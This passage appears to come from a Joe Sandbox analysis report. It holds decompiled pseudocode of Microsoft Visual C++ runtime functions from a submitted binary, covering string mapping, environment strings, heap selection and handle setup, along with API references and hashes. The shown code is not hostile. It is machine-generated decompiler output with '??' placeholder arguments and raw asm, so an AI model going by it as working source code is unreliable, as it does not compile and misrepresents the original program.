                              • API ID: File$HandleModuleNameWrite
                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $X*B$*B
                              • API String ID: 3784150691-2787626558
                              • Opcode ID: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                              • Instruction ID: 83e6cc08efc147308ddc610541e3e7ace00831554afff49654370310fabd765f
                              • Opcode Fuzzy Hash: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                              • Instruction Fuzzy Hash: 6E310472A00218AFEF20E660DD45FDA737DEB45344F5000ABF544D6140EBBCAAC58BAD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041881D Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                              Download Yara Rule
                              C-Code - Quality: 61%
                              			E0041881D(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x41be00);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x423554; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E00418A41(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x423554; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x42354c; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00413CC0(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E00413CC0(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x41bdf8, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x41bdf4, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x423554 = 2;
							goto L5;
						}
					} else {
						 *0x423554 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}























                              0x00418820
                              0x00418822
                              0x00418827
                              0x00418832
                              0x00418833
                              0x0041883a
                              0x00418840
                              0x00418845
                              0x0041884b
                              0x00418893
                              0x00418896
                              0x0041889e
                              0x004188a4
                              0x004188a5
                              0x004188a5
                              0x004188a8
                              0x004188b0
                              0x004188d2
                              0x00000000
                              0x004188d8
                              0x004188db
                              0x004188dd
                              0x004188e2
                              0x004188e2
                              0x004188f2
                              0x00418902
                              0x00418904
                              0x00418909
                              0x00000000
                              0x0041890f
                              0x0041890f
                              0x0041891a
                              0x0041891f
                              0x00418924
                              0x00418927
                              0x00418943
                              0x00000000
                              0x0041895e
                              0x00418970
                              0x00418972
                              0x00418977
                              0x00000000
                              0x00418979
                              0x0041897d
                              0x004189bf
                              0x004189ce
                              0x004189d3
                              0x004189d6
                              0x004189d8
                              0x004189db
                              0x004189f5
                              0x00000000
                              0x00418a0f
                              0x00418a12
                              0x00418a13
                              0x00418a14
                              0x00418a1a
                              0x00418a1d
                              0x00418a16
                              0x00418a16
                              0x00418a17
                              0x00418a17
                              0x00418a30
                              0x00418a34
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00418a34
                              0x0041897f
                              0x00418982
                              0x00418a3a
                              0x00418a3a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00418982
                              0x0041897d
                              0x00418977
                              0x00418943
                              0x00418909
                              0x004188b2
                              0x004188c4
                              0x004188c4
                              0x0041884d
                              0x0041884d
                              0x0041884e
                              0x00418851
                              0x00418867
                              0x00418883
                              0x004189ab
                              0x004189ab
                              0x00418889
                              0x00418889
                              0x00000000
                              0x00418889
                              0x00418869
                              0x00418869
                              0x00000000
                              0x00418869
                              0x00418867
                              0x004189b3
                              0x004189be

                              APIs
                              • LCMapStringW.KERNEL32(00000000,00000100,0041BDF8,00000001,00000000,00000000,766870F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 0041885F
                              • LCMapStringA.KERNEL32(00000000,00000100,0041BDF4,00000001,00000000,00000000,?,?,004186BE,?,?,?,00000000,00000001), ref: 0041887B
                              • LCMapStringA.KERNEL32(?,?,?,004186BE,?,?,766870F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188C4
                              • MultiByteToWideChar.KERNEL32(?,004256C5,?,004186BE,00000000,00000000,766870F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188FC
                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,004186BE,?,00000000,?,?,004186BE,?), ref: 00418954
                              • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,004186BE,?), ref: 0041896A
                              • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,004186BE,?), ref: 0041899D
                              • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,004186BE,?), ref: 00418A05
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: String$ByteCharMultiWide
                              • String ID:
                              • API String ID: 352835431-0
                              • Opcode ID: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                              • Instruction ID: 3960beb12fca16cbc5043acf4b8975ab8d8a6698fa07e30ad5f7fd63c5f4fb56
                              • Opcode Fuzzy Hash: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                              • Instruction Fuzzy Hash: 14517B71900209EFCF228F95CC45AEF7FB5FF48794F10452AF918A1260C7398991DBAA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041750F Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0041750F() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x423508; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E00413E65(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00414090(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E00413E65(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E00413F9F(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x423508 = 2;
					goto L18;
				}
				 *0x423508 = 1;
				goto L6;
			}















                              0x00417511
                              0x00417520
                              0x00417522
                              0x00417524
                              0x00417528
                              0x00417560
                              0x004175ea
                              0x00417638
                              0x00000000
                              0x00417638
                              0x004175ec
                              0x004175ee
                              0x004175fc
                              0x004175fe
                              0x00417600
                              0x0041760c
                              0x0041760f
                              0x00417617
                              0x0041761c
                              0x00417625
                              0x0041761e
                              0x0041761e
                              0x0041761e
                              0x0041762e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417602
                              0x00417602
                              0x00417602
                              0x00417602
                              0x00417603
                              0x00417607
                              0x00417608
                              0x00000000
                              0x00417602
                              0x004175f6
                              0x004175fa
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004175fa
                              0x00417566
                              0x00417568
                              0x00417576
                              0x00417579
                              0x0041757b
                              0x0041758b
                              0x00417597
                              0x0041759e
                              0x004175a4
                              0x004175a8
                              0x004175ab
                              0x004175b3
                              0x004175b7
                              0x004175c8
                              0x004175ce
                              0x004175d4
                              0x004175d4
                              0x004175d8
                              0x004175d8
                              0x004175b7
                              0x004175dd
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041757d
                              0x0041757d
                              0x0041757d
                              0x0041757e
                              0x0041757f
                              0x00417585
                              0x00417586
                              0x00000000
                              0x0041757d
                              0x0041756c
                              0x00417570
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417570
                              0x0041752c
                              0x00417530
                              0x00417544
                              0x00417548
                              0x00000000
                              0x00000000
                              0x0041754e
                              0x00000000
                              0x0041754e
                              0x00417532
                              0x00000000

                              APIs
                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041752A
                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041753E
                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041756A
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175A2
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175C4
                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175DD
                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 004175F0
                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041762E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                              • String ID:
                              • API String ID: 1823725401-0
                              • Opcode ID: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                              • Instruction ID: 0d29547afa55ef8e208fbe3ff43deda8167c9cf171b961166aceb77faed46397
                              • Opcode Fuzzy Hash: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                              • Instruction Fuzzy Hash: 4A31ADB250D3157ED7207F799C848FBBABDEA49368B11053BF555C3200EA298DC286AD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418A6C Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                              Download Yara Rule
                              C-Code - Quality: 78%
                              			E00418A6C(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x41be18);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x423558; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x42354c; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00413CC0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00417DA0(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x42353c; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x41bdf8, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x41bdf4, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x423558 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}





















                              0x00418a6f
                              0x00418a71
                              0x00418a76
                              0x00418a81
                              0x00418a82
                              0x00418a89
                              0x00418a8f
                              0x00418a92
                              0x00418a9b
                              0x00418adb
                              0x00418ade
                              0x00418b07
                              0x00000000
                              0x00418b0d
                              0x00418b10
                              0x00418b12
                              0x00418b17
                              0x00418b17
                              0x00418b27
                              0x00418b31
                              0x00418b37
                              0x00418b3c
                              0x00000000
                              0x00418b3e
                              0x00418b3e
                              0x00418b4b
                              0x00418b50
                              0x00418b53
                              0x00418b55
                              0x00418b5b
                              0x00418b70
                              0x00418b76
                              0x00000000
                              0x00418b78
                              0x00418b87
                              0x00418b8f
                              0x00000000
                              0x00418b91
                              0x00418b99
                              0x00418b99
                              0x00418b8f
                              0x00418b76
                              0x00418b3c
                              0x00418ae0
                              0x00418ae0
                              0x00418ae5
                              0x00418ae7
                              0x00418ae7
                              0x00418af9
                              0x00418af9
                              0x00418a9d
                              0x00418aa0
                              0x00418aa3
                              0x00418ab3
                              0x00418acd
                              0x00418ba1
                              0x00418ba1
                              0x00418ad3
                              0x00418ad5
                              0x00000000
                              0x00418ad5
                              0x00418ab5
                              0x00418ab5
                              0x00418ad6
                              0x00418ad6
                              0x00000000
                              0x00418ad6
                              0x00418ab3
                              0x00418ba9
                              0x00418bb4

                              APIs
                              • GetStringTypeW.KERNEL32(00000001,0041BDF8,00000001,?,766870F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AAB
                              • GetStringTypeA.KERNEL32(00000000,00000001,0041BDF4,00000001,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AC5
                              • GetStringTypeA.KERNEL32(?,?,?,?,004186BE,766870F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AF9
                              • MultiByteToWideChar.KERNEL32(?,004256C5,?,?,00000000,00000000,766870F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418B31
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,004186BE,?), ref: 00418B87
                              • GetStringTypeW.KERNEL32(?,?,00000000,004186BE,?,?,?,?,?,?,004186BE,?), ref: 00418B99
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: StringType$ByteCharMultiWide
                              • String ID:
                              • API String ID: 3852931651-0
                              • Opcode ID: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                              • Instruction ID: e288f18e772608454304c6360a88be647065f5ca3cb36798b5d5ed4d75a3f5a0
                              • Opcode Fuzzy Hash: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                              • Instruction Fuzzy Hash: B0416DB2600219BFCF208F94DC86EEF7F79EB08794F10442AF915D2250D7389991CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004158B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                              Download Yara Rule
                              C-Code - Quality: 91%
                              			E004158B0(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E00413CC0(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E00415883( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E00417D60("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E00417CE0( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E00417C20(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E004179F0(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}


















                              0x004158b8
                              0x004158c5
                              0x004158d7
                              0x004158ed
                              0x00000000
                              0x004158ed
                              0x0041590c
                              0x004159e2
                              0x004159e6
                              0x004159f0
                              0x00000000
                              0x004159f2
                              0x00415914
                              0x00415920
                              0x00415922
                              0x00415922
                              0x00415926
                              0x0041592e
                              0x0041592e
                              0x00415930
                              0x00415931
                              0x00415922
                              0x0041594d
                              0x00415964
                              0x00415970
                              0x00415976
                              0x00415978
                              0x00415978
                              0x0041597c
                              0x00415984
                              0x00415984
                              0x00415986
                              0x00415987
                              0x00415978
                              0x00415999
                              0x0041594f
                              0x0041594f
                              0x0041594f
                              0x004159a2
                              0x00000000
                              0x00000000
                              0x004159a7
                              0x004159b0
                              0x00000000
                              0x00000000
                              0x004159b2
                              0x004159b3
                              0x004159b7
                              0x004159b9
                              0x004159bc
                              0x004159c2
                              0x004159be
                              0x004159be
                              0x004159be
                              0x004159c3
                              0x004159b9
                              0x004159cb
                              0x004159d6
                              0x00000000
                              0x00000000
                              0x004159f7

                              APIs
                              • GetVersionExA.KERNEL32 ref: 004158CF
                              • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00415904
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00415964
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: EnvironmentFileModuleNameVariableVersion
                              • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                              • API String ID: 1385375860-4131005785
                              • Opcode ID: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                              • Instruction ID: 007b09a40ac423c1d447adb87a92c2e34be193f5817f586218815b66d4303cb2
                              • Opcode Fuzzy Hash: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                              • Instruction Fuzzy Hash: 403177F1961648EDEF3196709C82BDF3B78DB46324F2400DBD185D6242E6388EC68B1B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00417641 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                              Download Yara Rule
                              C-Code - Quality: 99%
                              			E00417641() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E00413E65(0x480);
				if(_t89 == 0) {
					E00414C0C(0x1b);
				}
				 *0x425900 = _t89;
				 *0x425a00 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x425900; // 0x2050630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x425900; // 0x2050630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x425a00);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x425a00 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x425900[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x425904;
					while(1) {
						_t69 = E00413E65(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x425a00 =  *0x425a00 + 0x20;
						__eflags =  *0x425a00;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
